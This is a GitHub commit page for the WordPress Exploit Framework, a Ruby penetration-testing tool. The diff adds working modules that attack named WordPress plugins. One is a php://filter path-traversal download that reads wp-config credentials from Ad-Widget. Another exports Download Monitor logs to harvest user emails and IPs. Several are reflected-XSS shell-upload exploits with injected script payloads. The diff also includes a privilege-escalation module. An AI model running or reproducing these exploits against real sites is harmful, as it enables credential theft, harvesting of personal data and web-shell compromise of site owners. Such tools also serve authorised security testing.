Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit fc6d150

Browse files
committed
Merge branch 'development'
2 parents f9524e0 + 6b69473 commit fc6d150

File tree

74 files changed

+1608
-13
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

74 files changed

+1608
-13
lines changed

.gitignore

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -103,3 +103,6 @@ typings/
103103
# Compiled Angular TypeScript
104104
lib/web/public/app/**/*.js
105105
lib/web/public/app/**/*.map
106+
107+
# SQLite databases
108+
db/*

Gemfile

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ gem 'mime-types', '>=3.1'
44
gem 'nokogiri', '~>1.7.0'
55
gem 'require_all', '~>1.4'
66
gem 'rubyzip', '~>1.2'
7-
gem 'slop', '~>4.4.1'
7+
gem 'slop', '~>4.5'
88
gem 'typhoeus', '~>1.1.2'
99

1010
group :test do

lib/wpxf/net/http_client.rb

Lines changed: 3 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -14,6 +14,8 @@ def initialize
1414

1515
initialize_options
1616
initialize_advanced_options
17+
18+
@hydra = Typhoeus::Hydra.new(max_concurrency: max_http_concurrency)
1719
end
1820

1921
# Initialize the basic HTTP options for the module.
@@ -106,6 +108,7 @@ def queue_request(opts, &callback)
106108
end
107109

108110
@hydra.queue req
111+
@hydra.queued_requests
109112
end
110113

111114
# Execute multiple HTTP requests in parallel queued by {#queue_request}.
@@ -179,13 +182,6 @@ def execute_delete_request(opts)
179182
def max_http_concurrency
180183
normalized_option_value('max_http_concurrency')
181184
end
182-
183-
# Run the module.
184-
# @return [Boolean] true if the module was successful.
185-
def run
186-
super
187-
@hydra = Typhoeus::Hydra.new(max_concurrency: max_http_concurrency)
188-
end
189185
end
190186
end
191187
end

lib/wpxf/wordpress/login.rb

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -44,11 +44,13 @@ def wordpress_login(user, pass)
4444
end
4545

4646
private def execute_wp_login_request(user, pass)
47+
res = nil
4748
scoped_option_change('follow_http_redirection', false) do
48-
return execute_post_request(
49+
res = execute_post_request(
4950
url: wordpress_url_login,
5051
body: wordpress_login_post_body(user, pass)
5152
)
5253
end
54+
res
5355
end
5456
end
Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
class Wpxf::Auxiliary::AdWidgetPhpFileDownload < Wpxf::Module
2+
include Wpxf::WordPress::FileDownload
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
9+
author: [
10+
'Rob Carr <rob[at]rastating.com>' # WPXF module
11+
],
12+
references: [
13+
['WPVDB', '8789']
14+
],
15+
date: 'Apr 04 2017'
16+
)
17+
end
18+
19+
def check
20+
check_plugin_version_from_readme('ad-widget', '2.12.0')
21+
end
22+
23+
def requires_authentication
24+
true
25+
end
26+
27+
def default_remote_file_path
28+
'../wp-config'
29+
end
30+
31+
def working_directory
32+
'wp-admin/'
33+
end
34+
35+
def downloader_url
36+
normalize_uri(wordpress_url_plugins, 'ad-widget', 'views', 'modal', 'index.php')
37+
end
38+
39+
def validate_result(res)
40+
return false unless super(res)
41+
42+
if export_path.nil?
43+
res.body = Base64.decode64(res.body)
44+
else
45+
content = Base64.decode64(File.read(export_path))
46+
File.open(export_path, 'wb') { |f| f.write(content) }
47+
end
48+
49+
true
50+
end
51+
52+
def download_request_params
53+
{ 'step' => "php://filter/convert.base64-encode/resource=#{remote_file}" }
54+
end
55+
end

modules/auxiliary/download_manager_authenticated_privilege_escalation.rb

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -66,6 +66,7 @@ def run
6666
'payment_account' => '0'
6767
}
6868

69+
mod_result = true
6970
scoped_option_change('follow_http_redirection', false) do
7071
res = execute_post_request(
7172
url: full_uri,
@@ -77,10 +78,10 @@ def run
7778
emit_success "User #{username} now has full admin rights"
7879
else
7980
emit_error 'Failed to escalate privileges'
80-
return false
81+
mod_result = false
8182
end
8283
end
8384

84-
return true
85+
mod_result
8586
end
8687
end
Lines changed: 122 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,122 @@
1+
require 'csv'
2+
3+
class Wpxf::Auxiliary::DownloadMonitorLogExport < Wpxf::Module
4+
include Wpxf
5+
6+
def initialize
7+
super
8+
9+
update_info(
10+
name: 'Download Monitor <= 1.9.6 Log Export',
11+
desc: %(
12+
This module allows a user of any level to export a CSV of the download logs, which
13+
includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
14+
),
15+
author: [
16+
'James Golovich', # Disclosure
17+
'Rob Carr <rob[at]rastating.com>' # WPXF module
18+
],
19+
references: [
20+
['WPVDB', '8810']
21+
],
22+
date: 'May 05 2017'
23+
)
24+
25+
register_options([
26+
StringOption.new(
27+
name: 'export_path',
28+
desc: 'The file to save the export to',
29+
required: true
30+
)
31+
])
32+
end
33+
34+
def check
35+
check_plugin_version_from_readme('download-monitor', '1.9.7')
36+
end
37+
38+
def requires_authentication
39+
true
40+
end
41+
42+
def export_path
43+
return nil if normalized_option_value('export_path').nil?
44+
File.expand_path normalized_option_value('export_path')
45+
end
46+
47+
def process_row(row)
48+
return unless row[:user_login] && row[:user_email]
49+
emit_success "Found user: #{row[:user_login]} (#{row[:user_email]})", true
50+
@users.push(id: row[:user_login], email: row[:user_email], ip: row[:user_ip])
51+
end
52+
53+
def parse_csv(body, delimiter)
54+
begin
55+
CSV::Converters[:blank_to_nil] = lambda do |field|
56+
field && field.empty? ? nil : field
57+
end
58+
csv = CSV.new(
59+
body,
60+
col_sep: delimiter,
61+
headers: true,
62+
header_converters: :symbol,
63+
converters: [:all, :blank_to_nil]
64+
)
65+
66+
csv.to_a.map { |row| process_row(row) }
67+
return true
68+
rescue
69+
return false
70+
end
71+
end
72+
73+
def execute_download_log_export
74+
res = execute_get_request(
75+
url: wordpress_url_admin,
76+
params: { 'dlm_download_logs' => 'true' },
77+
cookie: session_cookie
78+
)
79+
80+
if res.nil?
81+
emit_error 'No response from the target'
82+
return false
83+
end
84+
85+
if res.code != 200
86+
emit_error "Server responded with code #{res.code}"
87+
return false
88+
end
89+
90+
res
91+
end
92+
93+
def parse_and_display(content)
94+
@users = [{
95+
id: 'Username', email: 'E-mail', ip: 'IP Address'
96+
}]
97+
98+
unless parse_csv(content, ',') || parse_csv(content, ';')
99+
emit_error 'Failed to parse response, the CSV was invalid'
100+
emit_info "CSV content: #{content}", true
101+
return false
102+
end
103+
104+
emit_table @users
105+
end
106+
107+
def run
108+
return false unless super
109+
110+
emit_info 'Requesting download logs...'
111+
res = execute_download_log_export
112+
113+
emit_info 'Parsing response...'
114+
parse_and_display(res.body)
115+
116+
emit_info 'Saving export...'
117+
File.open(export_path, 'w') { |file| file.write(res.body) }
118+
emit_success "Saved export to #{export_path}"
119+
120+
true
121+
end
122+
end
Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
class Wpxf::Exploit::AdsensePluginReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
2+
def initialize
3+
super
4+
5+
update_info(
6+
name: 'Google AdSense <= 1.43 Reflected XSS Shell Upload'
7+
)
8+
end
9+
10+
def plugin_name
11+
'adsense-plugin'
12+
end
13+
14+
def fixed_version
15+
'1.44'
16+
end
17+
end
Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
class Wpxf::Exploit::AnswerMyQuestionReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StagedReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Answer My Question <= 1.3 Reflected XSS Shell Upload',
9+
author: [
10+
'Rob Carr <rob[at]rastating.com>' # WPXF module
11+
],
12+
references: [
13+
['WPVDB', '8800']
14+
],
15+
date: 'Apr 24 2017'
16+
)
17+
end
18+
19+
def check
20+
check_plugin_version_from_changelog('answer-my-question', 'readme.txt', '1.4')
21+
end
22+
23+
def vulnerable_url
24+
normalize_uri(wordpress_url_plugins, 'answer-my-question', 'modal.php')
25+
end
26+
27+
def initial_script
28+
create_basic_post_script(
29+
vulnerable_url,
30+
'id' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
31+
'posted' => '1',
32+
'notify' => '',
33+
'user_email' => Utility::Text.rand_email,
34+
'subject' => Utility::Text.rand_alpha(10),
35+
'question' => Utility::Text.rand_alpha(10),
36+
'answer' => Utility::Text.rand_alpha(10)
37+
)
38+
end
39+
end
Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::FeaturedPostsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Featured Posts <= 1.0.0 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-featured-posts'
13+
end
14+
15+
def fixed_version
16+
'1.0.0.1'
17+
end
18+
end
Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::GoogleAnalyticsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Google Analytics <= 1.7.0 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-google-analytics'
13+
end
14+
15+
def fixed_version
16+
'1.7.0.1'
17+
end
18+
end
Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::BwsGoogleMapsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Google Maps <= 1.3.5 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-google-maps'
13+
end
14+
15+
def fixed_version
16+
'1.3.5.1'
17+
end
18+
end
Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::LatestPostsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Latest Posts <= 0.2 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-latest-posts'
13+
end
14+
15+
def fixed_version
16+
'0.2.1'
17+
end
18+
end

0 commit comments

Comments
 (0)